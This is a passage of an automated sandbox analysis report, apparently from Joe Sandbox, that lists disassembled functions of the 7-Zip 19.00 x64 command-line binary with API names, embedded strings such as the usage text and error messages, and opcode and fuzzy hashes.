                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ExceptionThrowfreemalloc
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2861928636-0
                                                                                                                                                                                                                                                                            • Opcode ID: 715b52d3456352f88bffa419932dca49956056468a6bc82701705f4594a5e09d
                                                                                                                                                                                                                                                                            • Instruction ID: 2b76b68790a69ac8056bc526bd8f3f09e2be25b711fee543e9a56272a649de25
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 715b52d3456352f88bffa419932dca49956056468a6bc82701705f4594a5e09d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0C812972209AC681CB60DB26E460BAEA76AF797B84F115016DB8E57B15CF38C446C708
                                                                                                                                                                                                                                                                            Function 006A72C8 Relevance: 25.1, APIs: 20, Instructions: 81COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                                                                                                                                                                                                                                                            • Instruction ID: b6c5a9e45ba0f661766d23e2015eb6704c564a7518e9897ff4c56459d1d646c5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FB31EEB2619D4185CB91FF36DC612ACB322EBC7F94F1901799F2D6B399CE20C8428358
                                                                                                                                                                                                                                                                            Function 0069DCB0 Relevance: 22.8, APIs: 10, Strings: 5, Instructions: 323COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID: 2$3$?$?$Z
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-3338962022
                                                                                                                                                                                                                                                                            • Opcode ID: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
                                                                                                                                                                                                                                                                            • Instruction ID: 9f17e1937b6abc7198b4324af2a8436364075da79816a34854f5019eb56bd5bf
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36C1B372214A8192CF70EF25D4901AEB727F7D5B84F404216EB9E83B69DE3AC946CB05
                                                                                                                                                                                                                                                                            Function 00673AFC Relevance: 21.4, APIs: 17, Instructions: 169COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
                                                                                                                                                                                                                                                                            • Instruction ID: 1d257632d59d66687db9556c1e722b5eb3731c871bc66d72ef947846ae9bbed1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F6514E73712E9089CB65EF36C4A46AD6322FB86F98B198176DF1E2B758CF24C905C314
                                                                                                                                                                                                                                                                            Function 0069D998 Relevance: 21.2, APIs: 13, Strings: 1, Instructions: 197COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$wcscmp
                                                                                                                                                                                                                                                                            • String ID: ..\
                                                                                                                                                                                                                                                                            • API String ID: 4021281200-2756224523
                                                                                                                                                                                                                                                                            • Opcode ID: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
                                                                                                                                                                                                                                                                            • Instruction ID: 1b2391fc1319ab3743f93f6dd171bfb9b443212fdeacbece045459727bd92ea0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33617C62718A8086CF60EF16E49025EB726FBD6B94F590135EF4E1BB68DF79C842C704
                                                                                                                                                                                                                                                                            Function 006A0B2C Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 71COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$free$fputc
                                                                                                                                                                                                                                                                            • String ID: Modified: $Path: $Size:
                                                                                                                                                                                                                                                                            • API String ID: 2662072562-3207571042
                                                                                                                                                                                                                                                                            • Opcode ID: 496fa3ffaf823c2aebc81c865e07b2af86b11c6c8c3a8b9c12195a7aa1bd88ef
                                                                                                                                                                                                                                                                            • Instruction ID: 49b4eea61b9f956821e0c4b00081b858f842456a977a166d3e7331d30437c344
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 496fa3ffaf823c2aebc81c865e07b2af86b11c6c8c3a8b9c12195a7aa1bd88ef
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D22175A6300D0181EF10FF65E9A036D6323FB86BE8F449225EE2D537A5DF29C569C741
                                                                                                                                                                                                                                                                            Function 0066BF04 Relevance: 20.3, APIs: 16, Instructions: 327COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: b4b88fefa1dc8cc45d876b51e8a403cde685ba7d07cf5a0b4bc54341fa2cdd8b
                                                                                                                                                                                                                                                                            • Instruction ID: e6d8b2937f8badc9a1d53adf3f3d88c16645081c208c3ea32b1a22a0d771b295
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b4b88fefa1dc8cc45d876b51e8a403cde685ba7d07cf5a0b4bc54341fa2cdd8b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73C18332318D8192CB60EF65D49016EA772F7C6B90F505126EB8EA3B69CF3ACD45CB44
                                                                                                                                                                                                                                                                            Function 0069EE5C Relevance: 19.8, APIs: 12, Strings: 1, Instructions: 344COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID: hh
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-692164407
                                                                                                                                                                                                                                                                            • Opcode ID: 92278cdab0ad5069273e32549c2c9c770d2a5dfe6a62cd2ad7786a5c7567a585
                                                                                                                                                                                                                                                                            • Instruction ID: c311fffc46fd1bad25c6f52fece9a93470f840758d7fc967aa125b576ba859d6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92278cdab0ad5069273e32549c2c9c770d2a5dfe6a62cd2ad7786a5c7567a585
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AAE18932314B8092DF54DF26D4947AEB7AAF789B84F054026EB8E83B24DF39C895C744
                                                                                                                                                                                                                                                                            Function 00670998 Relevance: 19.6, APIs: 12, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove$ExceptionThrow
                                                                                                                                                                                                                                                                            • String ID: Incorrect volume size:
                                                                                                                                                                                                                                                                            • API String ID: 3957182552-1799541332
                                                                                                                                                                                                                                                                            • Opcode ID: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
                                                                                                                                                                                                                                                                            • Instruction ID: 7a2d31d0526542675df5e87dfbcae15e096252ae2aacb626a1584cdc55b27126
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4051BF72204A84D2EF60EF25E8A03EDB322F785B84F448126DB9D477A5DF38CA95C754
                                                                                                                                                                                                                                                                            Function 00677178 Relevance: 19.0, APIs: 15, Instructions: 200COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: f4d9c5df7f8b7d7a50d10b176def1ac906b2dbe33b2ad29e85ea175187436e74
                                                                                                                                                                                                                                                                            • Instruction ID: e53b83d893d0c2d48b30111d0f7315344335fdc1e11f239325752eee79ad1f7d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f4d9c5df7f8b7d7a50d10b176def1ac906b2dbe33b2ad29e85ea175187436e74
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2718132208A4181DB50EF25E8603AD77A3FBC6BD4F444126EF5E877A9DF28C596C344
                                                                                                                                                                                                                                                                            Function 0066A8A0 Relevance: 18.2, APIs: 10, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0066339C: free.MSVCRT ref: 006633D7
                                                                                                                                                                                                                                                                              • Part of subcall function 0066339C: memmove.MSVCRT(00000000,?,?,00000000,006610A8), ref: 006633F2
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0066A90A
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0066A9AD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID: /$\
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-1600464054
                                                                                                                                                                                                                                                                            • Opcode ID: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
                                                                                                                                                                                                                                                                            • Instruction ID: 10deefea7fe0e5fd8707865675c728ff86d0ba5bd49a20512dc7a2ead3d0b10b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E251E83221864090CF60FFA1D5510BDA727EB827D4B505126BF4F67766DF28C946CB06
                                                                                                                                                                                                                                                                            Function 006A85C7 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 58COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 006A8630
                                                                                                                                                                                                                                                                            • Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 006A8640
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$fputs$memmove
                                                                                                                                                                                                                                                                            • String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
                                                                                                                                                                                                                                                                            • API String ID: 2337578458-4238946813
                                                                                                                                                                                                                                                                            • Opcode ID: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
                                                                                                                                                                                                                                                                            • Instruction ID: bac820b33effcd69a6b51a0522ddacf93e135fc5882f36f0db5520b0f9427d49
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 48114FB2305AC185DB60EF15E9903AEB323B786B94F545022CB5D67719CF39CCA6CB05
                                                                                                                                                                                                                                                                            Function 0066FEC8 Relevance: 16.6, APIs: 8, Strings: 3, Instructions: 146COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Incorrect item in listfile.Check charset encoding and -scs switch., xrefs: 0066FFDA, 0067000E
                                                                                                                                                                                                                                                                            • The file operation error for listfile, xrefs: 0066FF71
                                                                                                                                                                                                                                                                            • Cannot find listfile, xrefs: 0066FF12
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ExceptionThrow
                                                                                                                                                                                                                                                                            • String ID: Cannot find listfile$Incorrect item in listfile.Check charset encoding and -scs switch.$The file operation error for listfile
                                                                                                                                                                                                                                                                            • API String ID: 4001284683-1604901869
                                                                                                                                                                                                                                                                            • Opcode ID: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
                                                                                                                                                                                                                                                                            • Instruction ID: 2c530ccceeee359ee0ae047811ef0e59048e2834e196916d4120e74a7d4c979f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 96405dd8fb92279f030b02bc931f9dc36b9c89402a3ea1ebc254a3a14f5713aa
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A510272318681D2DA60EF12E8907AEB722F7867D4F80411AEF8D53B59DFB9C905CB00
                                                                                                                                                                                                                                                                            Function 00667524 Relevance: 16.4, APIs: 13, Instructions: 153COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ErrorLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 408039514-0
                                                                                                                                                                                                                                                                            • Opcode ID: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
                                                                                                                                                                                                                                                                            • Instruction ID: 4f9f18cb18ee76a3b605df2b7cd214f5fcef0d148a6cab85ced7934e7279d9c8
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 56e310f5247428a7174e856c66c809f8f157f3f47fc266d476a18a669d8f27e7
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B51B93221C90192DB60EF24F4A156EA762EBC2794F501216B79F837B9DF68CD47CB08
                                                                                                                                                                                                                                                                            Function 006A3148 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 52COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs
                                                                                                                                                                                                                                                                            • String ID: = $ERROR$ERRORS:$WARNING$WARNINGS:
                                                                                                                                                                                                                                                                            • API String ID: 1795875747-2836439314
                                                                                                                                                                                                                                                                            • Opcode ID: bfaef9fa8df0d205eec04fe16e9a27ef95300a9a3da73fd13572728b12155a0b
                                                                                                                                                                                                                                                                            • Instruction ID: 755f15d173641ea897f7b1915dc2e3e249473ca0ddb68e8be89f6d3131cde809
